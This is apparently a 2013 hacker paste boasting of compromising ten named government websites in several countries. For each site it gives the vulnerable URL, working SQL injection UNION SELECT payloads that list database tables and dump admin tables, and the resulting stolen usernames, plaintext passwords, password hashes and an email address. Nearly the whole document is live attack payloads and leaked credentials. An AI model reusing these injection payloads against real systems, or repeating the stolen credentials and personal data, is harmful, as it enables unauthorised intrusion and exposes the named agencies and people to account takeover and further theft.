supermanavc

10 WEBSITES .GOV HACKED BY SUP3RM4N - CYBER HATS

May 1st, 2013
  1. # 10 WEBSITES .GOV HACKED BY SUP3RM4N - CYBER HATS
  2.  
  3. target:http://eproc.dor.gov.np/
  4.  
  5. vul:http://eproc.dor.gov.np/tender_details.php?tid=-1936
  6.  
  7. tables --> http://eproc.dor.gov.np/tender_details.php?tid=-1936+union+select+0,group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables%20where%20table_schema=database()--
  8.  
  9. tbl_acknowledgement
  10. tbl_addenda
  11. tbl_admin_info
  12. tbl_adminlogin
  13. tbl_agency
  14. tbl_agency_category
  15. tbl_announcement
  16. tbl_archive_auction
  17. tbl_archive_tender
  18. tbl_award
  19. tbl_award1
  20. tbl_bid
  21. tbl_bid_document
  22. tbl_bid_document_additional
  23. tbl_bid_document_migrated
  24. tbl_bid_modification
  25. tbl_clarification
  26. tbl_company_category
  27. tbl_contract
  28. tbl_customer
  29.  
  30.  
  31. dump adminlogin --> http://eproc.dor.gov.np/tender_details.php?tid=-1936+union+select+0,pass_word,2,3,4,5,6,7,8,9,10,11,12+from+tbl_adminlogin
  32.  
  33. user:admin
  34. pass:0aab2640ced6d6defd09afc2c716abdf
  35.  
  36.  
  37.  
  38. -------------------------------------------------------------------------------------------------
  39.  
  40. target:http://www.eeaa.gov.eg/
  41.  
  42. vul:http://www.eeaa.gov.eg/arabic/main/allnews.asp?Article_Id=-1
  43.  
  44. dump login --> http://www.eeaa.gov.eg/arabic/main/allnews.asp?Article_Id=-1+union+select+0,username,password,3,4,5,6+from+login
  45.  
  46. user:adm
  47. pass:adm123
  48.  
  49. user:cdeca
  50. pass:cdeca06
  51.  
  52. user:ind
  53. pass:ind123
  54.  
  55. user:media
  56. pass:media184
  57.  
  58.  
  59. ------------------------------------------------------------------------------------------------
  60.  
  61.  
  62. target:http://www.rab.gov.bd/
  63.  
  64. vul:http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0
  65.  
  66. tables--> http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=database()
  67.  
  68. achievement
  69. achievement_cat
  70. activity
  71. appreciation
  72. arms_vehicle
  73. award
  74. battalion_history
  75. bookmark
  76. complain_rab
  77. complain_terror
  78. contact_us
  79. content
  80. crime
  81. forum_badwords
  82. forum_bannedip
  83. forum_post
  84. forum_topics
  85. hit_statistics
  86. hitcounter
  87. leftpanel_pic
  88. location
  89. lost_found
  90. lost_people
  91. member
  92. messages
  93. most_wanted
  94. news,notice
  95. our_tip
  96. panel_user
  97. photo_gallery
  98. pic_cat
  99. police_form
  100. predecessors
  101. publication
  102. rab_location
  103. related_link
  104. telephone_dir
  105. tender
  106. tips
  107. video
  108. wings
  109.  
  110. http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%22panel_user%22--
  111.  
  112. dump panel_user--> http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(user_type,0x3a,user_email,0x3a,user_login,0x3a,user_pass),4%20from%20panel_user--
  113.  
  114. data operator
  115. email:titu_nupur@yahoo.com
  116. user:web123
  117. pass:*bolbona007
  118. administrator
  119. email:titu_nupur@yahoo.com
  120. user:nazimnavy
  121. pass:*bolbona007
  122.  
  123. -------------------------------------------------------------------------------------------------
  124.  
  125.  
  126. target:http://www.commerce.gov.pk/
  127.  
  128. vul:http://www.commerce.gov.pk/ptmaview.php?ID=-32
  129.  
  130. tables --> http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1%2C2%2C3%2Cgroup_concat(table_name)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+information_schema.tables+where+table_schema%3Ddatabase()--
  131.  
  132. bot,moc_directory
  133. moc_jobs
  134. moc_notification
  135. moc_old_notification
  136. moc_tenders
  137. trademissiondirectory
  138. wp_moc_commentmeta
  139. wp_moc_comments
  140. wp_moc_directory
  141. wp_moc_jobs
  142. wp_moc_links
  143. wp_moc_newsletter
  144. wp_moc_ngg_album
  145. wp_moc_ngg_gallery
  146. wp_moc_ngg_pictures
  147. wp_moc_notification
  148. wp_moc_options
  149. wp_moc_postmeta
  150. wp_moc_posts
  151. wp_moc_tenders
  152. wp_moc_term_
  153.  
  154.  
  155. --------------------------------------------------------------------------------------------------
  156.  
  157.  
  158. target:http://www.ykxs.gov.cn/
  159.  
  160. vul:http://www.ykxs.gov.cn/jg_view.php?id=141
  161.  
  162. tables --> http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
  163.  
  164. 1cpclass
  165. 1datainfo
  166. 1pic
  167. 2datainfo
  168. administrator
  169. administrator5
  170. bbsclass
  171. bbsinfo
  172. class
  173. class5
  174. datainfo
  175. datainfo5
  176. goods
  177. nyy_administrator5
  178. pic
  179. wd
  180. web_config5
  181. xs_data
  182. xs_pic
  183. xs_tp
  184.  
  185. columns -- http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()--
  186.  
  187.  
  188. ---------------------------------------------------------------------------------------------------
  189.  
  190. target:http://www.sisonlgu.gov.ph/
  191.  
  192. vul:http://www.sisonlgu.gov.ph/announce.php?id=-6
  193.  
  194. tables --> http://www.sisonlgu.gov.ph/announce.php?id=-6+UNION+SELECT+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
  195.  
  196. announcements
  197. barangays
  198. comments
  199. congressman_reports
  200. demography
  201. departments
  202. downloads
  203. employees
  204. events
  205. features
  206. feedback
  207. links
  208. mayor_reports
  209. multimedia
  210. news
  211. officials
  212. photo_gallery
  213. pictures
  214. police_reports
  215. poll_questions
  216. pruducts
  217. sanggunian_enactments
  218. sports
  219. threads
  220. tourist_destinations
  221.  
  222. columns --> http://www.sisonlgu.gov.ph/announce.php?id=-6+union+select+1,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()--
  223.  
  224.  
  225. ---------------------------------------------------------------------------------------------------
  226.  
  227. target:http://www.tchjbh.gov.cn/
  228.  
  229. vul:http://www.tchjbh.gov.cn/news_display.php?id=148
  230.  
  231. tables --> http://www.tchjbh.gov.cn/news_display.php?id=148%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21%20from+information_schema.tables+where+table_schema=database()--
  232.  
  233. admin_authority
  234. admin_login
  235. admininfo
  236. advanced
  237. big_class
  238. count,files
  239. info
  240. information1
  241. ip
  242. message
  243. sec_class
  244. third_class
  245. tqinfo
  246. vote
  247.  
  248. dump admininfo--> http://www.tchjbh.gov.cn/news_display.php?id=148%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x2f,passwd),15,16,17,18,19,20,21%20from%20admininfo--
  249.  
  250. user:admin
  251. pass:25b9e816781be124c4e070f1e776ad7e
  252.  
  253.  
  254. -------------------------------------------------------------------------------------------------------
  255.  
  256. target:http://www.dpe.gov.za/
  257.  
  258. vul:http://www.dpe.gov.za/home.php?id=-1
  259.  
  260. tables --> http://www.dpe.gov.za/home.php?id=-1+union+all+select+1%2C2%2C3%2Cgroup_concat%28table_name%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+information_schema.tables+where+table_schema=database()--
  261.  
  262. NAVIGATION
  263. SURVEY_2008
  264. CONTENT
  265. SITECONTENT
  266. SUBSCRIBERS
  267. TBLSTATS
  268. TEMPNAVIGATION
  269. TOOLS
  270. USERS
  271.  
  272. dump users --> http://www.dpe.gov.za/home.php?id=-1+union+all+select+1%2C2%2C3%2Cconcat%28UserName%2C0x3a%2CPassword%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+users--
  273.  
  274. user:ANDREW
  275. pass:ANDREw
  276.  
  277.  
  278. --------------------------------------------------------------------------------------------------------
  279.  
  280. target:http://www.murrayky.gov/
  281.  
  282. vul:http://www.murrayky.gov/showevent.htm?ID=123
  283.  
  284. tables --> http://www.murrayky.gov/showevent.htm?ID=123+union+select+1%2C2%2C3%2C4%2C5%2Ctable_name%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16+from+information_schema.tables--
  285.  
  286. CHARACTER_SETS
  287. COLLATIONS
  288. COLLATION_CHARACTER_SET_APPLICABILITY
  289. COLUMNS
  290. COLUMN_PRIVILEGES
  291. KEY_COLUMN_USAGE
  292. PROFILING
  293. ROUTINES
  294. SCHEMATA
  295. SCHEMA_PRIVILEGES
  296. STATISTICS
  297. TABLES
  298. TABLE_CONSTRAINTS
  299. TABLE_PRIVILEGES
  300. TRIGGERS
  301. USER_PRIVILEGES
  302. VIEWS
  303. 2010events
  304. citybusiness
  305. contentman
  306. contentmanperson
  307. contentmanpolice
  308. datEvents
  309. datSettings
  310.  
  311. ------------------------------------------------------------------------------------------------------
  312.  
  313. target:http://clothing.pof.gov.pk/
  314.  
  315. vul:http://clothing.pof.gov.pk/portfolio.php?id=-1
  316.  
  317. tables --> http://clothing.pof.gov.pk/portfolio.php?id=-1+union+select+1%2C2%2Cgroup_concat(table_name)%2C4%2C5+from+information_schema.tables%20where%20table_schema=database()--
  318.  
  319.  
  320. admin
  321. category
  322. contact
  323. machines
  324. metatags
  325. news
  326.  
  327. dump admin --> http://clothing.pof.gov.pk/portfolio.php?id=-1+union+select+1%2C2%2Cadmin_resu%2C4%2C5+from+admin
  328.  
  329. user:admin
  330. pass:$hi&T=ER.Tth
  331.  
  332. #SUP3RM4N
  333. ----------------------------------------------------------------------------------------------------